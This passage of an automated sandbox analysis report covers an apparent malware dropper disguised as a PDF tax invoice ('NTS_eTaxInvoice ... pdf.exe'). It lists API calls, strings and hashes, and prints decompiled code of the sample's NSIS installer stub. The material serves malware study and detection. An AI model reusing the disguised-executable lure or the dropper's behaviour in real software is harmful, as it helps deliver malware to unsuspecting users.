                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                        • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                          • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe" ,00000000,?), ref: 0040397C
                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                        • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                        • CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
                        • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                        • ExitProcess.KERNEL32(?), ref: 00403A59
                        • OleUninitialize.OLE32(?), ref: 00403A5E
                        • ExitProcess.KERNEL32 ref: 00403A78
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                        • ExitProcess.KERNEL32 ref: 00403B0C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                        • String ID: "C:\Users\user\Desktop\NTS_eTaxInvoice 1-12-2021#U00b7pdf.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                        • API String ID: 2292928366-153168205
                        • Opcode ID: 8d24a3590c3fa0910ef95ef3363b7165c5538ed9a562f2e07edb708d24b89e61
                        • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                        • Opcode Fuzzy Hash: 8d24a3590c3fa0910ef95ef3363b7165c5538ed9a562f2e07edb708d24b89e61
                        • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00406873(WCHAR* _a4) {
                        				void* _t2;
                        
                        				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                        				if(_t2 == 0xffffffff) {
                        					return 0;
                        				}
                        				FindClose(_t2);
                        				return 0x4302b8;
                        			}




                        0x0040687e
                        0x00406887
                        0x00000000
                        0x00406894
                        0x0040688a
                        0x00000000

                        APIs
                        • FindFirstFileW.KERNELBASE(73BCFAA0,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,73BCFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,73BCFAA0,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                        • FindClose.KERNEL32(00000000), ref: 0040688A
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                        • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                        • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                        • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E00403BEC(void* __eflags) {
                        				intOrPtr _v4;
                        				intOrPtr _v8;
                        				int _v12;
                        				void _v16;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t22;
                        				void* _t30;
                        				void* _t32;
                        				int _t33;
                        				void* _t36;
                        				int _t39;
                        				int _t40;
                        				int _t44;
                        				short _t63;
                        				WCHAR* _t65;
                        				signed char _t69;
                        				signed short _t73;
                        				WCHAR* _t76;
                        				intOrPtr _t82;
                        				WCHAR* _t87;
                        
                        				_t82 =  *0x434f10;
                        				_t22 = E0040690A(2);
                        				_t90 = _t22;
                        				if(_t22 == 0) {
                        					_t76 = 0x42d268;
                        					L"1033" = 0x30;
                        					 *0x442002 = 0x78;
                        					 *0x442004 = 0;
                        					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                        					__eflags =  *0x42d268;
                        					if(__eflags == 0) {
                        						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                        					}
                        					lstrcatW(L"1033", _t76);
                        				} else {
                        					_t73 =  *_t22(); // executed
                        					E00406484(L"1033", _t73 & 0x0000ffff);
                        				}
                        				E00403EC2(_t78, _t90);
                        				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
                        				 *0x434f80 =  *0x434f18 & 0x00000020;
                        				 *0x434f9c = 0x10000;
                        				if(E00405F14(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                        					L16:
                        					if(E00405F14(_t98, _t86) == 0) {
                        						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                        					}
                        					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                        					 *0x433ee8 = _t30;
                        					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                        						L21:
                        						if(E0040140B(0) == 0) {
                        							_t32 = E00403EC2(_t78, __eflags);
                        							__eflags =  *0x434fa0;
                        							if( *0x434fa0 != 0) {
                        								_t33 = E00405672(_t32, 0);
                        								__eflags = _t33;
                        								if(_t33 == 0) {
                        									E0040140B(1);
                        									goto L33;
                        								}
                        								__eflags =  *0x433ecc;
                        								if( *0x433ecc == 0) {
                        									E0040140B(2);
                        								}
                        								goto L22;
                        							}
                        							ShowWindow( *0x42d248, 5);
                        							_t39 = E0040689A("RichEd20");
                        							__eflags = _t39;
                        							if(_t39 == 0) {
                        								E0040689A("RichEd32");
                        							}
                        							_t87 = L"RichEdit20W";
                        							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                        							__eflags = _t40;
                        							if(_t40 == 0) {
                        								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                        								 *0x433ec4 = _t87;
                        								RegisterClassW(0x433ea0);
                        							}
                        							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0);
                        							E00403B3C(E0040140B(5), 1);
                        							return _t44;
                        						}
                        						L22:
                        						_t36 = 2;
                        						return _t36;
                        					} else {
                        						_t78 =  *0x434f00;
                        						 *0x433ea4 = E00401000;
                        						 *0x433eb0 =  *0x434f00;
                        						 *0x433eb4 = _t30;
                        						 *0x433ec4 = 0x40a380;
                        						if(RegisterClassW(0x433ea0) == 0) {
                        							L33:
                        							__eflags = 0;
                        							return 0;
                        						}
                        						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                        						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                        						goto L21;
                        					}
                        				} else {
                        					_t78 =  *(_t82 + 0x48);
                        					_t92 = _t78;
                        					if(_t78 == 0) {
                        						goto L16;
                        					}
                        					_t76 = 0x432ea0;
                        					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                        					_t63 =  *0x432ea0; // 0x43
                        					if(_t63 == 0) {
                        						goto L16;
                        					}
                        					if(_t63 == 0x22) {
                        						_t76 = 0x432ea2;
                        						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                        					}
                        					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                        					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                        						L15:
                        						E0040653D(_t86, E00405E0C(_t76));
                        						goto L16;
                        					} else {
                        						_t69 = GetFileAttributesW(_t76);
                        						if(_t69 == 0xffffffff) {
                        							L14:
                        							E00405E58(_t76);
                        							goto L15;
                        						}
                        						_t98 = _t69 & 0x00000010;
                        						if((_t69 & 0x00000010) != 0) {
                        							goto L15;
                        						}
                        						goto L14;
                        					}
                        				}
                        			}

























                        0x00403bf2
                        0x00403bfb
                        0x00403c02
                        0x00403c04
                        0x00403c18
                        0x00403c2a
                        0x00403c33
                        0x00403c3c
                        0x00403c43
                        0x00403c48
                        0x00403c4f
                        0x00403c62
                        0x00403c62
                        0x00403c6d
                        0x00403c06
                        0x00403c06
                        0x00403c11
                        0x00403c11
                        0x00403c72
                        0x00403c7c
                        0x00403c85
                        0x00403c8a
                        0x00403c9b
                        0x00403d2d
                        0x00403d35
                        0x00403d3e
                        0x00403d3e
                        0x00403d54
                        0x00403d5a
                        0x00403d68
                        0x00403de9
                        0x00403df1
                        0x00403dfb
                        0x00403e00
                        0x00403e06
                        0x00403e90
                        0x00403e95
                        0x00403e97
                        0x00403eb3
                        0x00000000
                        0x00403eb3
                        0x00403e99
                        0x00403e9f
                        0x00403ea7
                        0x00403ea7
                        0x00000000
                        0x00403e9f
                        0x00403e14
                        0x00403e1f
                        0x00403e24
                        0x00403e26
                        0x00403e2d
                        0x00403e2d
                        0x00403e38
                        0x00403e40
                        0x00403e42
                        0x00403e44
                        0x00403e4d
                        0x00403e50
                        0x00403e56
                        0x00403e56
                        0x00403e75
                        0x00403e86
                        0x00000000
                        0x00403e8b
                        0x00403df3
                        0x00403df5
                        0x00000000
                        0x00403d6a
                        0x00403d6a
                        0x00403d76
                        0x00403d80
                        0x00403d86
                        0x00403d8b
                        0x00403d9a
                        0x00403eb8
                        0x00403eb8
                        0x00000000
                        0x00403eb8
                        0x00403da9
                        0x00403de4
                        0x00000000
                        0x00403de4
                        0x00403ca1
                        0x00403ca1
                        0x00403ca4
                        0x00403ca6
                        0x00000000
                        0x00000000
                        0x00403cb4
                        0x00403cc6
                        0x00403ccb
                        0x00403cd4
                        0x00000000
                        0x00000000
                        0x00403cda
                        0x00403cdc
                        0x00403ce9
                        0x00403ce9
                        0x00403cf2
                        0x00403cf8
                        0x00403d20
                        0x00403d28
                        0x00000000
                        0x00403d0a
                        0x00403d0b
                        0x00403d14
                        0x00403d1a
                        0x00403d1b
                        0x00000000
                        0x00403d1b
                        0x00403d16
                        0x00403d18
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403d18
                        0x00403cf8

                        APIs
                          • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                          • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                        • GetUserDefaultUILanguage.KERNELBASE(00000002,73BCFAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403C06
                          • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                        • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,?,?,?,C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,73BCFAA0), ref: 00403CED
                        • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,?,?,?,C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe,?,00000000,?), ref: 00403D0B
                        • LoadImageW.USER32 ref: 00403D54
                        • RegisterClassW.USER32 ref: 00403D91
                        • SystemParametersInfoW.USER32 ref: 00403DA9
                        • CreateWindowExW.USER32 ref: 00403DDE
                        • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                        • GetClassInfoW.USER32 ref: 00403E40
                        • GetClassInfoW.USER32 ref: 00403E4D
                        • RegisterClassW.USER32 ref: 00403E56
                        • DialogBoxParamW.USER32 ref: 00403E75
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                        • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Form_Pilleorms8.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                        • API String ID: 606308-3922206272
                        • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                        • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                        • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                        • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E0040307D(void* __eflags, signed int _a4) {
                        				DWORD* _v8;
                        				DWORD* _v12;
                        				void* _v16;
                        				intOrPtr _v20;
                        				char _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				intOrPtr _v40;
                        				signed int _v44;
                        				long _t50;
                        				void* _t53;
                        				void* _t57;
                        				intOrPtr* _t59;
                        				long _t60;
                        				long _t70;
                        				signed int _t77;
                        				intOrPtr _t80;
                        				long _t82;
                        				void* _t85;
                        				signed int _t87;
                        				void* _t89;
                        				long _t90;
                        				long _t93;
                        				void* _t94;
                        
                        				_t82 = 0;
                        				_v12 = 0;
                        				_v8 = 0;
                        				 *0x434f0c = GetTickCount() + 0x3e8;
                        				GetModuleFileNameW(0, 0x443800, 0x400);
                        				_t89 = E0040602D(0x443800, 0x80000000, 3);
                        				_v16 = _t89;
                        				 *0x40a018 = _t89;
                        				if(_t89 == 0xffffffff) {
                        					return L"Error launching installer";
                        				}
                        				_t92 = L"C:\\Users\\jones\\Desktop";
                        				E0040653D(L"C:\\Users\\jones\\Desktop", 0x443800);
                        				E0040653D(0x444000, E00405E58(_t92));
                        				_t50 = GetFileSize(_t89, 0);
                        				 *0x42aa24 = _t50;
                        				_t93 = _t50;
                        				if(_t50 <= 0) {
                        					L24:
                        					E00403019(1);
                        					if( *0x434f14 == _t82) {
                        						goto L29;
                        					}
                        					if(_v8 == _t82) {
                        						L28:
                        						_t34 =  &_v24; // 0x40387d
                        						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                        						_t94 = _t53;
                        						E004034E5( *0x434f14 + 0x1c);
                        						_t35 =  &_v24; // 0x40387d
                        						_push( *_t35);
                        						_push(_t94);
                        						_push(_t82);
                        						_push(0xffffffff); // executed
                        						_t57 = E004032B4(); // executed
                        						if(_t57 == _v24) {
                        							 *0x434f10 = _t94;
                        							 *0x434f18 =  *_t94;
                        							if((_v44 & 0x00000001) != 0) {
                        								 *0x434f1c =  *0x434f1c + 1;
                        							}
                        							_t40 = _t94 + 0x44; // 0x44
                        							_t59 = _t40;
                        							_t85 = 8;
                        							do {
                        								_t59 = _t59 - 8;
                        								 *_t59 =  *_t59 + _t94;
                        								_t85 = _t85 - 1;
                        							} while (_t85 != 0);
                        							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                        							 *(_t94 + 0x3c) = _t60;
                        							E00405FE8(0x434f20, _t94 + 4, 0x40);
                        							return 0;
                        						}
                        						goto L29;
                        					}
                        					E004034E5( *0x41ea18);
                        					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
                        						goto L29;
                        					} else {
                        						goto L28;
                        					}
                        				} else {
                        					do {
                        						_t90 = _t93;
                        						asm("sbb eax, eax");
                        						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                        						if(_t93 >= _t70) {
                        							_t90 = _t70;
                        						}
                        						if(E004034CF(0x416a18, _t90) == 0) {
                        							E00403019(1);
                        							L29:
                        							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                        						}
                        						if( *0x434f14 != 0) {
                        							if((_a4 & 0x00000002) == 0) {
                        								E00403019(0);
                        							}
                        							goto L20;
                        						}
                        						E00405FE8( &_v44, 0x416a18, 0x1c);
                        						_t77 = _v44;
                        						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                        							_a4 = _a4 | _t77;
                        							_t87 =  *0x41ea18; // 0x2e64a
                        							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                        							_t80 = _v20;
                        							 *0x434f14 = _t87;
                        							if(_t80 > _t93) {
                        								goto L29;
                        							}
                        							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                        								_v8 = _v8 + 1;
                        								_t93 = _t80 - 4;
                        								if(_t90 > _t93) {
                        									_t90 = _t93;
                        								}
                        								goto L20;
                        							} else {
                        								break;
                        							}
                        						}
                        						L20:
                        						if(_t93 <  *0x42aa24) {
                        							_v12 = E004069F7(_v12, 0x416a18, _t90);
                        						}
                        						 *0x41ea18 =  *0x41ea18 + _t90;
                        						_t93 = _t93 - _t90;
                        					} while (_t93 != 0);
                        					_t82 = 0;
                        					goto L24;
                        				}
                        			}




























                        0x00403085
                        0x00403088
                        0x0040308b
                        0x004030a5
                        0x004030aa
                        0x004030bd
                        0x004030c2
                        0x004030c5
                        0x004030cb
                        0x00000000
                        0x004030cd
                        0x004030d8
                        0x004030de
                        0x004030ef
                        0x004030f6
                        0x004030fe
                        0x00403103
                        0x00403105
                        0x004031f0
                        0x004031f2
                        0x004031fe
                        0x00000000
                        0x00000000
                        0x00403203
                        0x00403227
                        0x00403227
                        0x0040322c
                        0x00403232
                        0x0040323d
                        0x00403242
                        0x00403242
                        0x00403245
                        0x00403246
                        0x00403247
                        0x00403249
                        0x00403251
                        0x00403268
                        0x00403270
                        0x00403275
                        0x00403277
                        0x00403277
                        0x0040327f
                        0x0040327f
                        0x00403282
                        0x00403283
                        0x00403283
                        0x00403286
                        0x00403288
                        0x00403288
                        0x00403292
                        0x00403298
                        0x004032a6
                        0x00000000
                        0x004032ab
                        0x00000000
                        0x00403251
                        0x0040320b
                        0x0040321d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040310b
                        0x00403110
                        0x00403115
                        0x00403119
                        0x00403120
                        0x00403127
                        0x00403129
                        0x00403129
                        0x00403134
                        0x0040325c
                        0x00403253
                        0x00000000
                        0x00403253
                        0x00403141
                        0x004031c1
                        0x004031c5
                        0x004031ca
                        0x00000000
                        0x004031c1
                        0x0040314a
                        0x0040314f
                        0x00403157
                        0x0040317d
                        0x00403183
                        0x0040318c
                        0x00403192
                        0x00403197
                        0x0040319d
                        0x00000000
                        0x00000000
                        0x004031a7
                        0x004031af
                        0x004031b2
                        0x004031b7
                        0x004031b9
                        0x004031b9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004031a7
                        0x004031cb
                        0x004031d1
                        0x004031dd
                        0x004031dd
                        0x004031e0
                        0x004031e6
                        0x004031e6
                        0x004031ee
                        0x00000000
                        0x004031ee

                        APIs
                        • GetTickCount.KERNEL32 ref: 0040308E
                        • GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                          • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                          • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                        • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                        • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.672645823.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.672641565.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672652442.0000000000408000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672656687.000000000040A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672661358.000000000040D000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672665051.0000000000414000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672669296.000000000041A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672673110.000000000041E000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672676576.0000000000425000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672681388.0000000000431000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672686997.0000000000440000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.672691764.000000000044C000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                        • API String ID: 2803837635-138144483
                        • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                        • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                        • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                        • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 95%
                        			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                        				signed int _v8;
                        				int _v12;
                        				intOrPtr _v16;
                        				long _v20;
                        				intOrPtr _v24;
                        				short _v152;
                        				void* _t65;
                        				long _t70;
                        				intOrPtr _t75;
                        				long _t76;
                        				void* _t78;
                        				int _t88;
                        				intOrPtr _t92;
                        				intOrPtr _t95;
                        				long _t96;
                        				signed int _t97;
                        				int _t98;
                        				int _t99;
                        				void* _t101;
                        				void* _t102;
                        
                        				_t97 = _a16;
                        				_t92 = _a12;
                        				_v12 = _t97;
                        				if(_t92 == 0) {
                        					_v12 = 0x8000;
                        				}
                        				_v8 = _v8 & 0x00000000;
                        				_v16 = _t92;
                        				if(_t92 == 0) {
                        					_v16 = 0x422a20;
                        				}
                        				_t62 = _a4;
                        				if(_a4 >= 0) {
                        					E004034E5( *0x434f58 + _t62);
                        				}
                        				if(E004034CF( &_a16, 4) == 0) {
                        					L41:
                        					_push(0xfffffffd);
                        					goto L42;
                        				} else {
                        					if((_a19 & 0x00000080) == 0) {
                        						if(_t92 != 0) {
                        							if(_a16 < _t97) {
                        								_t97 = _a16;
                        							}
                        							if(E004034CF(_t92, _t97) != 0) {
                        								_v8 = _t97;
                        								L44:
                        								return _v8;
                        							} else {
                        								goto L41;
                        							}
                        						}
                        						if(_a16 <= _t92) {
                        							goto L44;
                        						}
                        						_t88 = _v12;
                        						while(1) {
                        							_t98 = _a16;
                        							if(_a16 >= _t88) {
                        								_t98 = _t88;
                        							}
                        							if(E004034CF(0x41ea20, _t98) == 0) {
                        								goto L41;
                        							}
                        							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
                        								L28:
                        								_push(0xfffffffe);
                        								L42:
                        								_pop(_t65);
                        								return _t65;
                        							}
                        							_v8 = _v8 + _t98;
                        							_a16 = _a16 - _t98;
                        							if(_a16 > 0) {
                        								continue;
                        							}
                        							goto L44;
                        						}
                        						goto L41;
                        					}
                        					_t70 = GetTickCount();
                        					 *0x40d384 =  *0x40d384 & 0x00000000;
                        					 *0x40d380 =  *0x40d380 & 0x00000000;
                        					_t14 =  &_a16;
                        					 *_t14 = _a16 & 0x7fffffff;
                        					_v20 = _t70;
                        					 *0x40ce68 = 8;
                        					 *0x416a10 = 0x40ea08;
                        					 *0x416a0c = 0x40ea08;
                        					 *0x416a08 = 0x416a08;
                        					_a4 = _a16;
                        					if( *_t14 <= 0) {
                        						goto L44;
                        					} else {
                        						goto L9;
                        					}
                        					while(1) {
                        						L9:
                        						_t99 = 0x4000;
                        						if(_a16 < 0x4000) {
